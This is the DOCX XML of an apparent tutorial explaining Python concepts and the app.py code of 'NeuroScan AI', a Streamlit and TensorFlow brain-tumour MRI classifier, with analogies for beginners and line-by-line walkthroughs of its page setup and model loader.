        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wearing knee pads and a helmet while riding a bicycle: if you hit a pebble and stumble, you don't break a bone—you brush yourself off and keep riding safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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try:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      number = int("invalid_number")</w:t>
              <w:br/>
              <w:t xml:space="preserve">  except ValueError:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      number = 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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if not model_path.exists():</w:t>
              <w:br/>
              <w:t xml:space="preserve">      st.error(f"Model file not found at: {model_path}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return None, None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevents the web server from throwing an ugly, scary Python traceback to a clinician if a file path is misconfigured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uncaught exceptions immediately crash the Streamlit web process and terminate the application.</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9. Type Hints and Annotations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explicit type markers indicating what data types a function expects to receive and return (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>def func(x: int) -&gt; str:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like a square peg hole on a wooden puzzle board: it shows you that a square peg belongs here, even though a wooden hammer could technically force a round peg through.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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def resize_scan(image_array: np.ndarray, target_dim: tuple[int, int]) -&gt; np.ndarray:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return cv2.resize(image_array, target_dim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Important Technical Truth:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In standard Python, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>type hints do NOT enforce types at runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Python is dynamically typed. Passing a string to an argument annotated as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> will NOT throw a TypeError unless runtime validation libraries like Pydantic are used. Type hints exist for developer clarity, IDE autocompletion, and static linters (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mypy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Helps developers immediately understand data structures without digging through third-party documentation.</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10. Virtual Environments (`.venv`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> An isolated directory tree containing a dedicated Python executable and private copy of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>site-packages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Having your own private coloring pencil box with your name on it, so your little brother cannot swap your sharp red pencil for a dull broken crayon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.venv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>D:\Brain_Tumor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Isolates TensorFlow 2.15 and NumPy 1.26 from other projects on the machine that might require PyTorch or NumPy 2.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Global package upgrades on the host machine break neural network checkpoint deserialization.</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6: Detailed Code Explanation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>In this chapter, every important block of our actual codebase is dissected with line-by-line rigor, input/output data types, internal mechanics, and failure modes.</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6.1 Dissecting `app.py`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Block 1: Page Configuration &amp; Root Setup</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import os</w:t>
              <w:br/>
              <w:t>from pathlib import Path</w:t>
              <w:br/>
              <w:t>import glob</w:t>
              <w:br/>
              <w:t>import numpy as np</w:t>
              <w:br/>
              <w:t>from PIL import Image</w:t>
              <w:br/>
              <w:t>import cv2</w:t>
              <w:br/>
              <w:t>import streamlit as st</w:t>
              <w:br/>
              <w:t>import tensorflow as tf</w:t>
              <w:br/>
              <w:br/>
              <w:t>st.set_page_config(</w:t>
              <w:br/>
              <w:t xml:space="preserve">    page_title="NeuroScan AI — Brain Tumor Diagnostic System",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    page_icon="🧠",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    layout="wide",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    initial_sidebar_state="expanded"</w:t>
              <w:br/>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>File &amp; Location:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>d:\Brain_Tumor\app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Lines 1–19)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Line-by-Line Mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.set_page_config(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Must be the very first Streamlit call in the script. It configures the browser tab title, favicon emoji, enables wide-screen responsive layout (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>layout="wide"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), and ensures the sidebar is open on initial load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected Inputs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keyword arguments (strings, boolean).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expected Outputs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mutates Streamlit's internal page metadata state before rendering HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What Happens If Placed Later:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.set_page_config()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> after any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.markdown()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> raises a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StreamlitSetPageConfigMustBeFirstCommandError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and halts the application.</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Block 2: In-Memory Model Loader &amp; Fallback Logic</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BASE_DIR = Path(__file__).resolve().parent</w:t>
              <w:br/>
              <w:t>CLASS_NAMES = ["glioma", "meningioma", "notumor", "pituitary"]</w:t>
              <w:br/>
              <w:t>CLASS_DISPLAY = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "glioma": "Glioma Tumor",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "meningioma": "Meningioma Tumor",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "notumor": "Healthy (No Tumor)",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "pituitary": "Pituitary Tumor"</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>@st.cache_resource(show_spinner=False)</w:t>
              <w:br/>
              <w:t>def load_neuroscan_model():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Loads and caches the best trained model in memory.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    preferred_path = BASE_DIR / "models" / "brain_tumor_mobilenetv2_full_scratch.keras"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    fallback_path = BASE_DIR / "models" / "brain_tumor_mobilenetv2_best.keras"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    model_path = preferred_path if preferred_path.exists() else fallback_path</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if not model_path.exists():</w:t>
              <w:br/>
              <w:t xml:space="preserve">        st.error(f"Model file not found at: {model_path}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return None, None</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    model = tf.keras.models.load_model(model_path)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    base_model = [l for l in model.layers if "mobilenet" in l.name.lower()][0]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return model, base_model</w:t>
              <w:br/>
              <w:br/>
              <w:t>model, base_model = load_neuroscan_model()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Line-by-Line Mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Path(__file__).resolve().parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Computes the absolute filesystem directory of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>D:\Brain_Tumor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), regardless of the user's terminal working directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@st.cache_resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Caching decorator. Stores the returned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(model, base_model)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuple in global application memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>preferred_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Points to our 86.12% full-dataset model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fallback_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Points to the 82.19% baseline model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[l for l in model.layers if "mobilenet" in l.name.lower()][0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
